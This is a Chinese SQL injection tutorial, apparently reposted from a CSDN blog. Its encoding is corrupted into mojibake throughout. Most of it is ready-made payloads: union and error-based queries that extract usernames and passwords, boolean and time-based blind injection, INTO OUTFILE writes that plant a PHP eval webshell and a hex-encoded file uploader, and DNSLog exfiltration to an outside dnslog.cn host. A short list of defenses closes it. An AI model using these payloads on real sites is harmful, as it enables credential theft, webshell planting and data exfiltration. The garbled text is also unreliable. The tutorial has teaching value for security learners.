所謂的sql注入就是通過某種方式將惡意的sql代碼添加到輸入?yún)?shù)中����,然后傳遞到sql服務(wù)器使其解析并執(zhí)行的一種攻擊手法。
SQL可分為平臺層注入和代碼層注入�����。
平臺層注入:由于不安全的數(shù)據(jù)庫配置或數(shù)據(jù)庫平臺的漏洞導(dǎo)致����。
代碼層注入:程序員對輸入沒有細致的過濾����,從而執(zhí)行了非法的數(shù)據(jù)查詢��。
原因:在前后端數(shù)據(jù)的交互中�����,前端的數(shù)據(jù)傳到后臺處理時����,沒有做嚴格的判斷�����,導(dǎo)致其傳入的數(shù)據(jù)拼接到SQL語句中���,被當成SQL語句的一部分執(zhí)行�,從而導(dǎo)致數(shù)據(jù)庫受損�����,信息丟失。
總結(jié):后臺服務(wù)器接收相關(guān)參數(shù)未經(jīng)過過濾直接帶入數(shù)據(jù)庫查詢���。
例子:
| https://blog.csdn.net/aboutus.php?id=1 |
其后臺sql語句:
| $sql=“select 123 from abc where id='1 '" |
這條語句是采用拼接方式去對數(shù)據(jù)庫內(nèi)容進行查詢的��,攻擊者通過單引號 ' 閉合數(shù)據(jù)庫查詢語句�����,并且可以構(gòu)造這樣的惡意url:https://blog.csdn.net/aboutus.php?id=-1'select password from admin# 去查詢admin表用戶的密碼��,而非查詢預(yù)先程序員所設(shè)計好的數(shù)據(jù)內(nèi)容���。
其中:url中?代表傳值的意思�����,id代表變量�,等號代表變量的值。
瀏覽器通常使用 ? 來表示GET方法傳遞參數(shù)���,而使用POST傳遞參數(shù)是不會顯示到URL中的�,因此URL中含有?說明就是使用GET方法傳遞參數(shù)����。POST型注入和Cookie注入需要插件和工具才可進行。
常見的注入類型
1. 參數(shù)類型分類:
數(shù)字型��、字符型
聯(lián)合查詢注入���、報錯注入�、基于布爾的盲注����、基于時間的盲注、HTTP頭注入�、寬字節(jié)注入、堆疊查詢����、二階注入��。當輸入的參數(shù)為整形時�����,若存在注入漏洞����,則是數(shù)字型注入���。
如:
| https://blog.csdn.net/aboutus.php?id=1 |
此時后臺語句:
| $sql=“select 123 from abc where id='1 '" |
檢測方法:URL輸入 and 1=1 / and 1=2 報錯則說明有注入
字符型
當輸入?yún)?shù)為字符串時,稱為字符型注入�。
它與數(shù)字型的區(qū)別:數(shù)字型不需要單引號來閉合,而字符串需要單引號來閉合���。
例:
| https://blog.csdn.net/aboutus.php?id=1’ |
此時后臺語句:
| $sql=“select 123 from abc where id='1''" |
此時多出了一個單引號���,破壞了原本的SQL語句結(jié)構(gòu),數(shù)據(jù)庫無法處理��,于是會報錯�����,證明這條語句成功被帶進數(shù)據(jù)庫查詢,存在字符型注入����。
此時通過 --+把后面的單引號注釋掉,SQL語句也會形成閉合�����。
所以我們可以這樣:
?id = 1’ 攻擊語句 --+
傳入頁面就變成了
select user from database where id = ‘1’ 攻擊語句 -- ’
--+:起注釋作用,將后面的語句注釋掉�����,在url中+相當于空格�����,–是注釋符號���,單行注釋���,之所以要加+號是因為–與單引號連在一起無法起注釋作用因此必須把它們隔開。
聯(lián)合查詢注入
聯(lián)合查詢適合于有顯示位的注入���,即頁面某個位置會根據(jù)我們輸入的數(shù)據(jù)的變化而變化�����。
輸入id=1和id=2,若頁面中值有變化���,說明輸入與數(shù)據(jù)庫有交互
直接輸入?id=1’若有報錯則存在注入�,開始判斷可以從哪里注入,?id=2’1=2–+頁面顯示不正常����,說明此處存在SQL注入,注入點在引號�。
接下來開始使用SQL語句進行攻擊。
例:
若n=5 ��,如果表少于5列就會報錯��,說明表中只有n-1列
判斷顯示位時�,要使用 ?id=-1 或者改為0 讓前面的select語句查詢?yōu)榭斟e誤,然后采用后面的select語句去查詢:
| ?id=-1’ union select 1,2,3 --+ |
觀察頁面在哪里回顯我們的輸入��,就可以用那個地方測試接下的語句���。
| ?id=1’ union select 1,database(),3 --+ |
在之前回顯2的地方會回顯database數(shù)據(jù)庫的名字����。
?id=1’ union select 1,group_concat(table_name),3
from information_schema.tables where table_schema=database() --+ |
數(shù)據(jù)庫語句懶得解釋了�����。
?id=1’ union select 1,group_concat(column_name),3 from
information_schema.column where table_schema=’爆出來的數(shù)據(jù)庫名‘ and table_name=‘爆出來的表名’ --+ |
| ?id=-1’ union select 1,group_concat(id,’–‘,username,’–',password),3 from users --+ |
報錯注入
含義:就是在mysql中使用指定函數(shù)來制造報錯,查詢的時候加一些格式錯誤的信息����,它會提示你格式錯誤,可以在中間加入一些其他信息�����,比如select database(),報錯信息后面也會出現(xiàn)數(shù)據(jù)庫信息.
報錯注入:利用數(shù)據(jù)庫的報錯信息得到數(shù)據(jù)庫的內(nèi)容��。因此需要構(gòu)造語句讓數(shù)據(jù)庫報錯���。
三種報錯注入的方法:
| and (select 1 from (select count(*),concat((select 查詢的內(nèi)容 from information_schema.tables limit 0,1),floor(rand()*2))x from information_schema.table group by x)a) --+ |
| ?id=1' and extractvalue(1,concat('^',(select database()),'^')) --+//獲取數(shù)據(jù)庫名字 |
extractvalue(xml_frag,xpath_expr)�����;
函數(shù)接受兩個參數(shù)�,第一個為XML標記內(nèi)容�����,也就是查詢的內(nèi)容����,第二個為XPATH路徑,也就是查詢的路徑��。
如果沒有匹配的內(nèi)容�,不管出于何種原因,只要路徑有效并且查詢的內(nèi)容由正確嵌套和關(guān)閉的元素組成�����,返回空字符串��。
但如果路徑寫入錯誤格式�����,就會報錯并且返回我們寫入的非法內(nèi)容�����。
| ?id=1' and updatexml(1,conncat('^',(需要查詢的內(nèi)容),'^')�,1) --+ |
updatexml(xml_target,xpath_expr,new_xml);
此函數(shù)將XML標記的給定片段的單個部分替換為xml_target新的XML片段new_xml��,然后返回更改的XML�。
xml_target替換的部分 與xpath_expr 用戶提供的XPath表達式匹配。如果未xpath_expr找到表達式匹配 �����,或者找到多個匹配項,則該函數(shù)返回原始 xml_targetXML片段����。
所有三個參數(shù)都應(yīng)該是字符串。與extractvalue()類似��,如果XPATH寫入錯誤格式���,就會報錯�����,并且返回我們寫入的非法內(nèi)容����。
floor(x)��,返回小于或等于x的最大整數(shù)�。
回顯注入
回顯注入:利用注入漏洞可以改變頁面返回數(shù)據(jù)。
基于布爾的盲注
布爾盲注:即在頁面不顯示數(shù)據(jù)����,只顯示對錯����,此時我們輸入的語句讓頁面呈現(xiàn)兩種狀態(tài)����,相當于true和false�����,根據(jù)這兩種狀態(tài)判斷我們輸入的語句是否查詢成功��。
因此需要構(gòu)造判斷語句����,根據(jù)頁面是否回顯證實猜想。
一般用到的函數(shù):
ascii()��、 substr()��、length()�����、exists()�����、concat()等。
步驟:
判斷數(shù)據(jù)庫類型
數(shù)據(jù)庫可能的類型:
MySQL���、 access����、 SQL sever ���、information_schema.tables���、msysobjects、sysobjects
//猜測當前數(shù)據(jù)庫中是否存在admin表
http://127.0.0.1/sqli/Less-5/?id=1' and exists(select*from admin) --+
1:判斷當前數(shù)據(jù)庫中表的個數(shù)
// 判斷當前數(shù)據(jù)庫中的表的個數(shù)是否大于5���,用二分法依次判斷����,最后得知當前數(shù)據(jù)庫表的個數(shù)為4
http://127.0.0.1/sqli/Less-5/?id=1' and (select count(table_name) from information_schema.tables where table_schema=database())>3 --+
2:判斷每個表的長度
//判斷第一個表的長度,用二分法依次判斷��,最后可知當前數(shù)據(jù)庫中第一個表的長度為6
http://127.0.0.1/sqli/Less-5/?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>6 --+
//判斷第二個表的長度����,用二分法依次判斷,最后可知當前數(shù)據(jù)庫中第二個表的長度為6
http://127.0.0.1/sqli/Less-5/?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 1,1))=6 --+
3:判斷每個表的每個字符的ascii值
//判斷第一個表的第一個字符的ascii值
http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100 --+
//判斷第一個表的第二個字符的ascii值
http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))>100 --+
----------由此可判斷出存在表emails��、referers����、uagents��、users�����,猜測users表中最有可能存在賬戶和密碼�����,所以以下判斷字段和數(shù)據(jù)在users表中判斷
爆字段中的數(shù)據(jù)(字段中的數(shù)據(jù)長度���、數(shù)據(jù)的ASCII)
1: 判斷數(shù)據(jù)的長度
// 判斷id字段的第一個數(shù)據(jù)的長度
http://127.0.0.1/sqli/Less-5/?id=1' and length((select id from users limit 0,1))>5 --+
// 判斷id字段的第二個數(shù)據(jù)的長度
http://127.0.0.1/sqli/Less-5/?id=1' and length((select id from users limit 1,1))>5 --+
2:判斷數(shù)據(jù)的ascii值
// 判斷id字段的第一行數(shù)據(jù)的第一個字符的ascii值
http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select id from users limit 0,1),1,1))>100 --+
// 判斷id字段的第二行數(shù)據(jù)的第二個字符的ascii值
http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select id from users limit 0,1),2,1))>100 --+
...........
基于時間的盲注
時間注入:通過返回時間的長短判斷�。
如:獲取第一個字符的ascii碼�����,判斷是否大于115�����,不成立延時五秒返回����。
補充:
sleep(5)的意思是延遲五秒。
if(expr1,expr2,expr3) 若expr1的值為true�,則返回expr2的值,如果expr1的值為false��,則返回expr3的值�����。
例:
| ?id=1' and if(ascii(substr(database(),2,1))= 101,sleep(5),0) --+ |
此處就是判斷數(shù)據(jù)庫名字的第二個字母����。
HTTP頭注入
常見的SQL注入一般是通過請求參數(shù)或是表單進行注入���,而HTTP頭注入是通過HTTP協(xié)議頭部字段值進行注入��。
條件:
1. 能夠?qū)φ埱箢^信息進行修改
2. 修改的請求頭信息能帶入數(shù)據(jù)庫進行查詢
3. 數(shù)據(jù)庫沒有對輸入的請求信息做過濾
user-Agent注入
cookie注入
Referer注入
X-Forwarded-For注入
寬字節(jié)注入
DNSLog注入
什么是dnslog����?
dns服務(wù)主要是域名解析服務(wù)器將域名轉(zhuǎn)換成ip時��,會生成一個日志�����,主要記錄:什么時候請求解析����,什么域名�,映射出什么ip;
但一般來說是看不到解析日志的���,但有開放的平臺:dnslog.cn
2. UNC:
UNC全名:universal naming convention��,通用命名規(guī)則�。其實是網(wǎng)絡(luò)上的資源的格式,在Windows里使用��。
3. mysql讀寫函數(shù):
(mysql可以讀寫文件的�。)
4. 配置:
secure_file_priv的配置值分三種——
指定文件夾:讀寫導(dǎo)入導(dǎo)出只能發(fā)生在指定文件夾
不設(shè)置:不允許執(zhí)行
null:無限制
5. 讀取文件過程:
讀文件:LOAD_FILE()
限制:只能本機的文件且文件有讀取權(quán)限,且字節(jié)數(shù)小于max_allowed_packet
判斷文件有無讀取權(quán)限:
and (select count(*) from mysql.user)>0
/*
如果結(jié)果返回正常���,說明具有讀寫權(quán)限��。
如果返回錯誤�����,應(yīng)該是管理員給數(shù)據(jù)庫賬戶降權(quán)���。
如果文件不存在或者不能被讀出,函數(shù)返回空�����。在 windows 下�����,如果 NTFS 設(shè)置得當,是不能讀取相關(guān)的文件的��,當遇到只有administrators才能訪問的文件��,users就別想 load_file 出來����。
*/
用法:select LOAD_FILE(‘E:\in.txt’);
兩個難點:
絕對的物理路徑
構(gòu)造有效的畸形語句(報錯出絕對路徑)
在很多 PHP 程序中,當提交一個錯誤的 Query�,如果 display_errors = on,程序就會暴露 WEB 目錄的絕對路徑����,只要知道路徑,那么對于一個可以注入的 PHP 程序來說����,整個服務(wù)器的安全將受到嚴重的威脅�����。
常用路徑:http://www.cnblogs.com/lcamry/p/5729087.html
讀取示例:
6. 將文件導(dǎo)入進數(shù)據(jù)庫:
LOAD DATA INFILE語句用于高速從一個文本文件中讀取行并裝入一個表中���。文件名稱必須為一個文字字符串�。
示例:
| load data infile '/temp/t0.txt' ignore into table t0 character set gbk fields terminated by '\t' lines terminated by '\n' |
含義:將/tmp/t0.txt 導(dǎo)入到 t0 表中,character set gbk 是字符集設(shè)置為 gbk��,fields terminated by 是每一項數(shù)據(jù)之間的分隔符��,lines terminated by 是行的結(jié)尾符����。
注:當錯誤代碼是 2 的時候的時候,文件不存在���,錯誤代碼為 13 的時候是沒有權(quán)限���,可以考慮/tmp 等文件夾。
7. 導(dǎo)入到文件
格式:select … INTO OUTFILE ‘file_name’
可以把被選擇的行寫入一個文件中����。該文件被創(chuàng)建到服務(wù)器主機上,因此您必須擁有 FILE權(quán)限��,才能使用此語法��。file_name 不能是一個已經(jīng)存在的文件���。
兩種利用形式:
select ... into outfile "c:\\phpnow\\htdocs\\test.php"
/*此處的...可以是一個函數(shù)如version()也可以是一句話如:<?php @eval($_post["111"]) ?>,或者其他內(nèi)容*/
select version() into outfile "c:\\phpnow\\htdocs\\test.php" LINES TERMINATED BY 0x16
解釋:select * from * limit 0,1 into outfile '/wamp/www/tmpulujm.php’的意思是將內(nèi)容輸入到outfile中�。
LINES TERMINATED BY則是into outfile的參數(shù),意思是行結(jié)尾的時候用by后面的內(nèi)容�����,通常的一般為‘/r/n’�����,此處我們將by后的內(nèi)容修改為后面的16進制的文件���。16 進制可以為一句話或者其他任何的代碼���,可自行構(gòu)造。
例如:
http://192.168.0.166/php/newsshow.php?cid=-6901 OR 3616%3D3616 LIMIT 0%2C1 INTO OUTFILE '%2Fwamp%2Fwww%2Ftmpulujm.php' LINES TERMINATED BY 0x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d5c5c77616d705c5c7777775c5c3e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a-- -- -
在 sqlmap 中 os-shell 采取的就是這樣的方式�����,具體可參考 os-shell 分析文章:http://www.cnblogs.com/lcamry/p/5505110.html
DNSlog注入流程:
1. 把select LOAD_FILE()注入到數(shù)據(jù)庫訪問日志文件
2. UNC構(gòu)建DNS服務(wù)器地址(其實就是服務(wù)器子域名)��,假裝訪問文件���,產(chǎn)生DNSLog
select load_file('aaa.yourid.dnslog.cn/byh');
四個斜杠其實本來只有兩個,還有兩個是防止轉(zhuǎn)義�����,/byh不能缺少,不然不是一個標準的路徑把子域名替換成函數(shù)或者查詢SQL
select if((select load_file(concat('',database(),'yourid.dnslog.cn/byh'))),1,0);
#其實就是把aaa換成了database()最后我們使用的平臺就會顯示解析日志��,在日志里就能看到查詢的內(nèi)容�。
數(shù)據(jù)庫信息泄露:用戶隱私信息泄露
網(wǎng)頁篡改:通過操縱數(shù)據(jù)庫對網(wǎng)頁進行篡改
網(wǎng)站被掛馬,傳播惡意軟件:修改數(shù)據(jù)庫一些字段的值���,嵌入木馬鏈接��,進行掛馬攻擊
數(shù)據(jù)庫被惡意操作:數(shù)據(jù)庫服務(wù)器被攻擊��,數(shù)據(jù)庫的系統(tǒng)管理員賬戶被篡改
服務(wù)器被遠程控制���,被安裝后門:經(jīng)由數(shù)據(jù)庫服務(wù)器提供的操作系統(tǒng)支持,黑客得以修改或控制操作系統(tǒng)
破壞硬盤數(shù)據(jù)��,癱瘓全系統(tǒng)
SQL漏洞修復(fù)和防范方法:
1�����、普通用戶與系統(tǒng)管理員用戶的權(quán)限要有嚴格的區(qū)分�����。
2、預(yù)編譯�����,如使用參數(shù)化語句和綁定變量��。
3�����、加強對用戶輸入的驗證����,識別惡意內(nèi)容,過濾掉某些危險語句�。
4、多使用SQL Server數(shù)據(jù)庫自帶的安全參數(shù)����。
5、轉(zhuǎn)義�����,把用戶的輸入當成文本以及用斜杠來轉(zhuǎn)義。
6�、數(shù)據(jù)庫異常信息隱藏����。
6、必要的情況下使用專業(yè)的漏洞掃描工具來尋找可能被攻擊的點��。
7�、設(shè)置陷阱賬號:
設(shè)置兩個帳號,一個是普通管理員帳號�����,一個是防注入的帳號����。將防注入的賬號設(shè)置的很像管理員,如 admin��,以制造假象吸引軟件的檢測���,而密碼是大于千字以上的中文字符���,迫使軟件分析賬號的時候進入全負荷狀態(tài)甚至資源耗盡而死機。
8、防火墻�,限制同IP時間、禁IP訪問�、黑名單。
10��、禁用某些參數(shù)�����,如secure file priv�。
版權(quán)聲明:本文為CSDN博主「今天小白努力學(xué)習(xí)了嗎」的原創(chuàng)文章,遵循CC 4.0 BY-SA版權(quán)協(xié)議�,轉(zhuǎn)載請附上原文出處鏈接及本聲明。
原文鏈接:https://blog.csdn.net/m0_56691564/article/details/127474864
該文章在 2023/5/15 21:48:07 編輯過
400 186 1886
